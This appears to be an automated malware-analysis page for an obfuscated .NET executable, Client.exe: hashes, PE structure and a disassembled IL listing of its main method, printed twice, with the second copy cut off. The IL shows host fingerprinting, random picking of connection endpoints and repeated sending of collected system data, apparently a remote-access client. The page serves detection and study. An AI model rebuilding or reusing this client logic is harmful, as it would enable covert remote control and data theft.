Suspicious
Suspect

18ef22f92a32fcb74643b63a768d37b3

PE Executable
|
MD5: 18ef22f92a32fcb74643b63a768d37b3
|
Size: 511.49 KB
|
application/x-dosexec

Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
18ef22f92a32fcb74643b63a768d37b3
Sha1
77f700b1f9784ba90473e6f51167e1404cf06c9e
Sha256
e6b6095b3fad0cc8387668a688aa9a64b4df657db688f9e71d33b3fbc9c32b3f
Sha384
41eb4de4987bf8e20fce0691e6272fdb638deabdb359763413d8dbd304764e870b0de13e42b556196782ab95931c1d1c
Sha512
7066777c00f70965c1a7945e8fdfccd9cf329f30df1bb51e99041b0dc5a0623019566eb15174da6e68add5e95ae8731fabcb8f69ebd52c703d618cc9e6a3382f
SSDeep
12288:/ykV1cir6vyQiekWu1r46xSc2KyPAAQkd82+h8dKx:MvPkz1afx7Qkd8fW
TLSH
2EB409257FA48E00D580287EC97E7A09CB12E4F22502A347374AF7A65D459DEEE2C3D7

PeID

.NET executable
Microsoft Visual C# / Basic .NET
Microsoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL
Microsoft Visual C# v7.0 / Basic .NET
Microsoft Visual Studio .NET
File Structure
18ef22f92a32fcb74643b63a768d37b3
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
s9rmcax0ldp2fl39v
5vl9g11n592cuoh
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::VDtnDkLXuchd(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

595
Main Method

System.Void saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::VDtnDkLXuchd(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::nxQLAvjETTazNECmYzotHpiKs() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::RvzhAhWOvaFIm() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::KDqenFZtdkLXn() stloc V_3 nop <null> ldloc V_3 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::pxPGTpdnFlStcyIbhPNejE() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::EQpWStGveT() br IL_000E: nop call System.Void saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::EQpWStGveT() call System.Void RkPOCxEFQOWFBuHe.frXsYYlRRhWoxl::jlJWhhFnmOYUzTyFjtHEDB() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::xblFtEddFatmY call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::ZuYanUxOJYqMhTgPO() call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::djzHljGWyfUsofIuuhtqce call System.Void HDDKyzyYouBx.ewveaougspeO::FubdKGFBMFSgnxLifdXW() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::djzHljGWyfUsofIuuhtqce call System.Boolean rvkJNtrmfeCQHVZD.CwhuIzPwrndnynZixcOZxoJ::iRwgpGjozF(System.String) brtrue IL_0080: call System.Void rvkJNtrmfeCQHVZD.ReSCHCXJTBxAen::wEcJiQunXwGchTYtqUzc() leave IL_0283: ret call System.Void rvkJNtrmfeCQHVZD.ReSCHCXJTBxAen::wEcJiQunXwGchTYtqUzc() call System.Void qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::hBqXheXVqOylhWzuWw() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldfld System.Boolean EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::fzlpvQiqBhq brtrue IL_026E: call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::DbbmZbcKmqRGKmD call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::DWmlYRPWduhZyLzpwfWyEMuda() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::BCwJIFlxLkgEFWpPpyvZK() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::iaRyNFuqbJKnQMZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::nZaKKZGfHJWyTEPENMtn ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::lboAzPIsaAIpXvh() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::alUWsKsfDV() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::XtSGdpVNTlJR() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::RYXNxETfbJMerDa() ldelem System.String call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jIweGlyItfzBiOPQUC() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UmehyBcvkFb() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::lumkcNmLgaPTSFRxNtwKp() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::piIGsMWXPMYLMaDotuiTfy() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldloc V_1 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::GoEbxcdqNCStNGvdnDhqYuWLP() ldelem System.String ldloc V_2 ldsfld System.Random qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::nZaKKZGfHJWyTEPENMtn ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::nUkJAMliaYACb(System.String,System.String) ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldfld System.Boolean EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::fzlpvQiqBhq brfalse IL_026E: call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb newobj System.Void qkShAPPaVXVXVo.LAzrhqeBYUzrFDqxirCeGult::.ctor(EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep) stfld qkShAPPaVXVXVo.LAzrhqeBYUzrFDqxirCeGult EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::pSoyXgjhZp ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb newobj System.Void HDDKyzyYouBx.VUuQQNBQyjGZp::.ctor(EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep) stfld HDDKyzyYouBx.VUuQQNBQyjGZp EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::MAbGvaiuOlwe ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jfhrJQwmoygBPJhqMNAZrKBk() newarr System.Object dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::sdzbMRtLEsy() call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::KgKcMcanSixanCMpSqwHvgOFC() call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::VtCwbSxxloXI() call System.Byte[] qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::zHQdhSCZXwj() stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::hJKqCZexmQmxLbgmqKQj() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::JWiXwRzImcMngDrJVbggwdCp stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::qTycQsDmTEFqtfHjUCTU() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::iathqBsVyXIGEZ stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jdPyPqRKvdGYA() call System.String System.Environment::get_UserName() call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::AtwCsCmzSt() call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::qLNlhaKSMhHSwYDVIxOWGqi() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::LSrDRzLnBHmaXcIhWykalZkqB stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::ABmbXazRsoRXHQmtARQ() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::JxTfRdPnABfEKZcBgje stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::rwtsHaUJKejzcjkfoiul() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::mphXSiZfLm stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::pZIGgNsKVVpZAmEHtUxF() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::NSdDYkOhKtVrCMaVzu stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::HOESuXfGFRXfACWllbMcyp() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::BBmpOTVpIKkcGCSoKxkt stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::uZcwgYvOxfsh() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::QIFNEjWKCrthjWmbTzwO stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::DolqMEPESuzkh() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::OnYOPaiDiHpI stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::HtkcrSGKsRayiKCa() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::IoaNoqCBUlnCfPPJBnRRuxm stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::IULhwpWQuZDcfcMzCnVMCBPEt() call System.String qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::ostialENJDGEAuI() stelem.ref <null> call System.Byte[] McdttMEIToAEqGRcJucZglAc.DpxQHTBHQJNJeXstuTHePYOTq::NiHpsLzTVFwOiebeZo(System.Object[]) callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::zbxaZwlbBJr(System.Byte[]) call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_008A: ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb pop <null> leave IL_0283: ret ret <null>
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::VDtnDkLXuchd(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

595
Main Method

System.Void saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::VDtnDkLXuchd(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::nxQLAvjETTazNECmYzotHpiKs() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::RvzhAhWOvaFIm() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::KDqenFZtdkLXn() stloc V_3 nop <null> ldloc V_3 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::pxPGTpdnFlStcyIbhPNejE() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::EQpWStGveT() br IL_000E: nop call System.Void saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::EQpWStGveT() call System.Void RkPOCxEFQOWFBuHe.frXsYYlRRhWoxl::jlJWhhFnmOYUzTyFjtHEDB() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::xblFtEddFatmY call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::ZuYanUxOJYqMhTgPO() call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::djzHljGWyfUsofIuuhtqce call System.Void HDDKyzyYouBx.ewveaougspeO::FubdKGFBMFSgnxLifdXW() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::djzHljGWyfUsofIuuhtqce call System.Boolean rvkJNtrmfeCQHVZD.CwhuIzPwrndnynZixcOZxoJ::iRwgpGjozF(System.String) brtrue IL_0080: call System.Void rvkJNtrmfeCQHVZD.ReSCHCXJTBxAen::wEcJiQunXwGchTYtqUzc() leave IL_0283: ret call System.Void rvkJNtrmfeCQHVZD.ReSCHCXJTBxAen::wEcJiQunXwGchTYtqUzc() call System.Void qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::hBqXheXVqOylhWzuWw() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldfld System.Boolean EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::fzlpvQiqBhq brtrue IL_026E: call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::DbbmZbcKmqRGKmD call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::DWmlYRPWduhZyLzpwfWyEMuda() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::BCwJIFlxLkgEFWpPpyvZK() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::iaRyNFuqbJKnQMZ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::nZaKKZGfHJWyTEPENMtn ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::lboAzPIsaAIpXvh() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::alUWsKsfDV() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::XtSGdpVNTlJR() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::RYXNxETfbJMerDa() ldelem System.String call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jIweGlyItfzBiOPQUC() newarr System.Char dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UmehyBcvkFb() call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::lumkcNmLgaPTSFRxNtwKp() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::piIGsMWXPMYLMaDotuiTfy() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldloc V_1 call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::GoEbxcdqNCStNGvdnDhqYuWLP() ldelem System.String ldloc V_2 ldsfld System.Random qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::nZaKKZGfHJWyTEPENMtn ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem System.String callvirt System.Void EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::nUkJAMliaYACb(System.String,System.String) ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldfld System.Boolean EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::fzlpvQiqBhq brfalse IL_026E: call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::UPNWFBrvrQVoKENMwtChMoOzf() ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb newobj System.Void qkShAPPaVXVXVo.LAzrhqeBYUzrFDqxirCeGult::.ctor(EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep) stfld qkShAPPaVXVXVo.LAzrhqeBYUzrFDqxirCeGult EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::pSoyXgjhZp ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb newobj System.Void HDDKyzyYouBx.VUuQQNBQyjGZp::.ctor(EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep) stfld HDDKyzyYouBx.VUuQQNBQyjGZp EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep::MAbGvaiuOlwe ldsfld EXnydOMnODIdlSETfDjc.dzmvCzrIZNlwvBcovVxoKnQep saFHZJTDzlvmeIxslJTaiw.UYrxKCdcJCCdKMmJeCGM::ZhDJQqOnprbyb call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jfhrJQwmoygBPJhqMNAZrKBk() newarr System.Object dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::sdzbMRtLEsy() call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::KgKcMcanSixanCMpSqwHvgOFC() call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::VtCwbSxxloXI() call System.Byte[] qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::zHQdhSCZXwj() stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::hJKqCZexmQmxLbgmqKQj() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::JWiXwRzImcMngDrJVbggwdCp stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::qTycQsDmTEFqtfHjUCTU() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::iathqBsVyXIGEZ stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::jdPyPqRKvdGYA() call System.String System.Environment::get_UserName() call System.String LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::AtwCsCmzSt() call System.String wuZmNYFPOzDUgn.uQVgKgeQjnHKjYRPp::FNVqxjNUNGMkBdTqFhacZrjjV(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::qLNlhaKSMhHSwYDVIxOWGqi() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::LSrDRzLnBHmaXcIhWykalZkqB stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::ABmbXazRsoRXHQmtARQ() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::JxTfRdPnABfEKZcBgje stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::rwtsHaUJKejzcjkfoiul() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::mphXSiZfLm stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::pZIGgNsKVVpZAmEHtUxF() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::NSdDYkOhKtVrCMaVzu stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::HOESuXfGFRXfACWllbMcyp() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::BBmpOTVpIKkcGCSoKxkt stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::uZcwgYvOxfsh() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::QIFNEjWKCrthjWmbTzwO stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::DolqMEPESuzkh() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::OnYOPaiDiHpI stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::HtkcrSGKsRayiKCa() ldsfld System.String saFHZJTDzlvmeIxslJTaiw.medzOWMPzRHFknaAOKQbWKac::IoaNoqCBUlnCfPPJBnRRuxm stelem.ref <null> dup <null> call System.Int32 LNhigsHyBgXXHZnpjCwsG.CNKJrtPXEbWgYLicStmlmvrR::IULhwpWQuZDcfcMzCnVMCBPEt() call System.String qkShAPPaVXVXVo.PRQXMVfbkMyfFmZFWdpBv::ostialENJDGEAuI() stelem.ref <null> call System.Byte[] McdttMEIToAEqGRcJucZglAc.DpxQHTBHQJNJeXstuTHePYOTq::NiHpsLzTVFwOiebeZo(System.Object[]) callvirt System.Void 